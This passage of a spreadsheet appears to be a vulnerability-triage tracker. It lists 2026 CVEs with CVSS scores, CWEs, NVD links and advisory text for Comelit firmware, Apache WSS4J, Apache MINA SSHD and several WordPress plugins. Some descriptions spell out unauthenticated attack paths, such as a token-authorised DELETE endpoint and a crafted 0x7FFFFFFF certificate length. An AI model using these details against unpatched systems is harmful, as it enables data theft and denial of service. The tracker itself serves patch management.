          <t>New</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80276</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>db4dfee8-a97e-4877-bfae-eba6d14a2166</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="inlineStr"/>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr"/>
      <c r="K236" s="5" t="inlineStr"/>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q236" s="5" t="inlineStr"/>
      <c r="R236" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S236" s="5" t="inlineStr">
        <is>
          <t>Comelit Multi-User Gateway for VIP System (model 1456B) firmware versions 2.9.1 and 2.10.0 expose a network-accessible management interface that does not require authentication. Through this interface, sensitive device configuration data - including the Remote Configuration Password - can be read in cleartext by a remote, unauthenticated attacker.</t>
        </is>
      </c>
      <c r="T236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80276</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85532</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="inlineStr"/>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr"/>
      <c r="K237" s="5" t="inlineStr"/>
      <c r="L237" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q237" s="5" t="inlineStr"/>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S237" s="5" t="inlineStr">
        <is>
          <t>Apache WSS4J accepted attacker-controlled derived-key lengths and offsets without adequate bounds. This could permit cryptographically weak keys or excessive CPU and memory consumption when processing crafted WS-Security messages. The fixes enforce a minimum key length of 16 bytes, a maximum length of 512 bytes, and a maximum offset of 4096 bytes.
Users are recommended to upgrade to versions 4.0.2 or 3.0.6 or 2.4.4, which fix this issue.</t>
        </is>
      </c>
      <c r="T237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85532</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89294</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="inlineStr"/>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K238" s="5" t="inlineStr"/>
      <c r="L238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q238" s="5" t="inlineStr"/>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="S238" s="5" t="inlineStr">
        <is>
          <t>The Simply Schedule Appointments plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.6.12.27 via the 'ssa_locale'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Notably, exploitation does not require authentication in practice, as the locale filter is installed unconditionally on every request during plugins_loaded and the callback performs no nonce or capability check before returning the raw GET parameter value.</t>
        </is>
      </c>
      <c r="T238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89294</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92121</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="inlineStr"/>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr"/>
      <c r="K239" s="5" t="inlineStr"/>
      <c r="L239" s="5" t="inlineStr"/>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q239" s="5" t="inlineStr"/>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S239" s="5" t="inlineStr">
        <is>
          <t>In the WSS4J streaming (StAX) code, a signature reference using the WS-Security STR-Transform leaves an internal "inside signed content" flag permanently set. The WS-SecurityPolicy enforcer uses that flag to decide whether an element needs checking, so it stops evaluating SignedParts and SignedElements for the rest of the message. A policy requiring the SOAP Body to be signed is then satisfied even when the Body carries no signature, removing the protection against XML Signature Wrapping. Signature verification itself is unaffected. The DOM code is not affected. 
Users are recommended to upgrade to versions 4.0.2 or 3.0.6 or 2.4.4 which fix this issue.</t>
        </is>
      </c>
      <c r="T239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92121</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92245</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="inlineStr"/>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K240" s="5" t="inlineStr"/>
      <c r="L240" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q240" s="5" t="inlineStr"/>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S240" s="5" t="inlineStr">
        <is>
          <t>The Simply Schedule Appointments plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.12.32 via the 'recursive' parameter. This makes it possible for unauthenticated attackers to extract customer PII — including names, email addresses, phone numbers, and custom form field data — stored in appointment records, as well as per-appointment public_token values. The leaked per-appointment public_token values also enable unauthenticated attackers to delete arbitrary appointments via the DELETE /wp-json/ssa/v1/appointments/{id} endpoint, which accepts the token as sole authorization.</t>
        </is>
      </c>
      <c r="T240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92245</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94002</t>
        </is>
      </c>
      <c r="D241" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F241" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="inlineStr"/>
      <c r="I241" s="5" t="inlineStr"/>
      <c r="J241" s="5" t="inlineStr"/>
      <c r="K241" s="5" t="inlineStr"/>
      <c r="L241" s="5" t="inlineStr"/>
      <c r="M241" s="5" t="inlineStr"/>
      <c r="N241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O241" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P241" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q241" s="5" t="inlineStr"/>
      <c r="R241" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S241" s="5" t="inlineStr">
        <is>
          <t>Possible memory exhaustion in SFTP clients (DefaultSftpClient) in component sshd-sftp in Apache MINA SSHD versions 0.9.0 to 2.19.0 and 3.0.0-M1 to 3.0.0-M5.
Apache 
MINA SSHD is a Java library for client-side and server-side SSH. The sshd-sftp component provides support for SFTP.
The SFTP client implementation, when receiving a reply, did not check that this reply corresponded to a request sent earlier. Unsolicited replies would be stored but never consumed. A malicious server could keep sending unsolicited replies until available memory in the client was exhausted.
Users are recommended to upgrade to version 2.20.0 or 3.0.0-M6, which fix this issue.</t>
        </is>
      </c>
      <c r="T241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94002</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94120</t>
        </is>
      </c>
      <c r="D242" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F242" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G242" s="5" t="inlineStr"/>
      <c r="H242" s="5" t="inlineStr"/>
      <c r="I242" s="5" t="inlineStr"/>
      <c r="J242" s="5" t="inlineStr"/>
      <c r="K242" s="5" t="inlineStr"/>
      <c r="L242" s="5" t="inlineStr"/>
      <c r="M242" s="5" t="inlineStr"/>
      <c r="N242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O242" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P242" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q242" s="5" t="inlineStr"/>
      <c r="R242" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S242" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in GravityExport Lite for Gravity Forms &lt;= 2.7.2 versions.</t>
        </is>
      </c>
      <c r="T242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94120</t>
        </is>
      </c>
    </row>
    <row r="243">
      <c r="A243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94123</t>
        </is>
      </c>
      <c r="D243" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F243" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G243" s="5" t="inlineStr"/>
      <c r="H243" s="5" t="inlineStr"/>
      <c r="I243" s="5" t="inlineStr"/>
      <c r="J243" s="5" t="inlineStr"/>
      <c r="K243" s="5" t="inlineStr"/>
      <c r="L243" s="5" t="inlineStr"/>
      <c r="M243" s="5" t="inlineStr"/>
      <c r="N243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O243" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P243" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q243" s="5" t="inlineStr"/>
      <c r="R243" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S243" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Arbitrary File Download in NextGEN Gallery &lt;= 4.5.0 versions.</t>
        </is>
      </c>
      <c r="T243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94123</t>
        </is>
      </c>
    </row>
    <row r="244">
      <c r="A244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B244" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94178</t>
        </is>
      </c>
      <c r="D244" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F244" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G244" s="5" t="inlineStr"/>
      <c r="H244" s="5" t="inlineStr"/>
      <c r="I244" s="5" t="inlineStr"/>
      <c r="J244" s="5" t="inlineStr"/>
      <c r="K244" s="5" t="inlineStr"/>
      <c r="L244" s="5" t="inlineStr"/>
      <c r="M244" s="5" t="inlineStr"/>
      <c r="N244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O244" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P244" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q244" s="5" t="inlineStr"/>
      <c r="R244" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S244" s="5" t="inlineStr">
        <is>
          <t>Subscriber Privilege Escalation in Import and export users and customers &lt;= 2.5.2 versions.</t>
        </is>
      </c>
      <c r="T244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94178</t>
        </is>
      </c>
    </row>
    <row r="245">
      <c r="A245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B245" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95587</t>
        </is>
      </c>
      <c r="D245" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F245" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G245" s="5" t="inlineStr"/>
      <c r="H245" s="5" t="inlineStr"/>
      <c r="I245" s="5" t="inlineStr"/>
      <c r="J245" s="5" t="inlineStr"/>
      <c r="K245" s="5" t="inlineStr"/>
      <c r="L245" s="5" t="inlineStr"/>
      <c r="M245" s="5" t="inlineStr"/>
      <c r="N245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O245" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P245" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q245" s="5" t="inlineStr"/>
      <c r="R245" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S245" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Hostinger Migrator &lt;= 1.0 versions.</t>
        </is>
      </c>
      <c r="T245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95587</t>
        </is>
      </c>
    </row>
    <row r="246">
      <c r="A246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95616</t>
        </is>
      </c>
      <c r="D246" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F246" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G246" s="5" t="inlineStr"/>
      <c r="H246" s="5" t="inlineStr"/>
      <c r="I246" s="5" t="inlineStr"/>
      <c r="J246" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K246" s="5" t="inlineStr"/>
      <c r="L246" s="5" t="inlineStr"/>
      <c r="M246" s="5" t="inlineStr"/>
      <c r="N246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O246" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P246" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q246" s="5" t="inlineStr"/>
      <c r="R246" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S246" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in WSS4J's DER bounds check lets an oversized allocation pass validation. An unauthenticated attacker can send a SOAP message carrying an X.509 certificate whose SubjectKeyIdentifier extension declares a length of 0x7FFFFFFF; WSS4J decodes this while resolving the signature's key reference, before the message is authenticated, so an eleven-byte extension triggers a 2 GB allocation. Repeated requests exhaust server memory.
Users are recommended to upgrade to versions 4.0.2 or 3.0.6 or 2.4.4, which fix this issue.</t>
        </is>
      </c>
      <c r="T246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95616</t>
        </is>
      </c>
    </row>
    <row r="247">
      <c r="A247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B247" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96348</t>
        </is>
      </c>
      <c r="D247" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F247" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G247" s="5" t="inlineStr"/>
      <c r="H247" s="5" t="inlineStr"/>
      <c r="I247" s="5" t="inlineStr"/>
      <c r="J247" s="5" t="inlineStr"/>
      <c r="K247" s="5" t="inlineStr"/>
      <c r="L247" s="5" t="inlineStr"/>
      <c r="M247" s="5" t="inlineStr"/>
      <c r="N247" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O247" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P247" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q247" s="5" t="inlineStr"/>
      <c r="R247" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S247" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Bookly &lt;= 28.2 versions.</t>
        </is>
      </c>
      <c r="T247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96348</t>
        </is>
      </c>
    </row>
    <row r="248">
      <c r="A248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96818</t>
        </is>
      </c>
      <c r="D248" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F248" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G248" s="5" t="inlineStr"/>
      <c r="H248" s="5" t="inlineStr"/>
      <c r="I248" s="5" t="inlineStr"/>
      <c r="J248" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K248" s="5" t="inlineStr"/>
      <c r="L248" s="5" t="inlineStr"/>
      <c r="M248" s="5" t="inlineStr"/>
      <c r="N248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O248" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P248" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q248" s="5" t="inlineStr"/>
      <c r="R248" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S248" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in WP Express Checkout (Accept PayPal Payments) &lt;= 2.4.9 versions.</t>
        </is>
      </c>
      <c r="T248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96818</t>
        </is>
      </c>
    </row>
    <row r="249">
      <c r="A249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B249" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96823</t>
        </is>
      </c>
      <c r="D249" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F249" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G249" s="5" t="inlineStr"/>
      <c r="H249" s="5" t="inlineStr"/>
      <c r="I249" s="5" t="inlineStr"/>
      <c r="J249" s="5" t="inlineStr"/>
      <c r="K249" s="5" t="inlineStr"/>
      <c r="L249" s="5" t="inlineStr"/>
      <c r="M249" s="5" t="inlineStr"/>
      <c r="N249" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O249" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P249" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q249" s="5" t="inlineStr"/>
      <c r="R249" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S249" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Arbitrary Content Deletion in Customer Reviews for WooCommerce &lt;= 5.120.0 versions.</t>
        </is>
      </c>
      <c r="T249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96823</t>
        </is>
      </c>
    </row>
    <row r="250">
      <c r="A250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B250" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97197</t>
        </is>
      </c>
      <c r="D250" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F250" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G250" s="5" t="inlineStr"/>
      <c r="H250" s="5" t="inlineStr"/>
      <c r="I250" s="5" t="inlineStr"/>
      <c r="J250" s="5" t="inlineStr"/>
      <c r="K250" s="5" t="inlineStr"/>
      <c r="L250" s="5" t="inlineStr"/>
      <c r="M250" s="5" t="inlineStr"/>
      <c r="N250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O250" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P250" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q250" s="5" t="inlineStr"/>
      <c r="R250" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S250" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in WordPress Backup &amp; Migration &lt;= 1.6.0 versions.</t>
        </is>
      </c>
      <c r="T250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97197</t>
        </is>
      </c>
    </row>
    <row r="251">
      <c r="A251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97240</t>
        </is>
      </c>
      <c r="D251" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F251" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G251" s="5" t="inlineStr"/>
      <c r="H251" s="5" t="inlineStr"/>
      <c r="I251" s="5" t="inlineStr"/>
      <c r="J251" s="5" t="inlineStr"/>
      <c r="K251" s="5" t="inlineStr"/>
      <c r="L251" s="5" t="inlineStr"/>
      <c r="M251" s="5" t="inlineStr"/>
      <c r="N251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O251" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P251" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q251" s="5" t="inlineStr"/>
      <c r="R251" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="S251" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Sensitive Data Exposure in StifLi Backup Tools &lt;= 2.2.7 versions.</t>
        </is>
      </c>
      <c r="T251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97240</t>
        </is>
      </c>
    </row>
    <row r="252">
      <c r="A252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97241</t>
        </is>
      </c>
      <c r="D252" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F252" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G252" s="5" t="inlineStr"/>
      <c r="H252" s="5" t="inlineStr"/>
      <c r="I252" s="5" t="inlineStr"/>
      <c r="J252" s="5" t="inlineStr"/>
      <c r="K252" s="5" t="inlineStr"/>
      <c r="L252" s="5" t="inlineStr"/>
      <c r="M252" s="5" t="inlineStr"/>
      <c r="N252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O252" s="5" t="inlineStr">
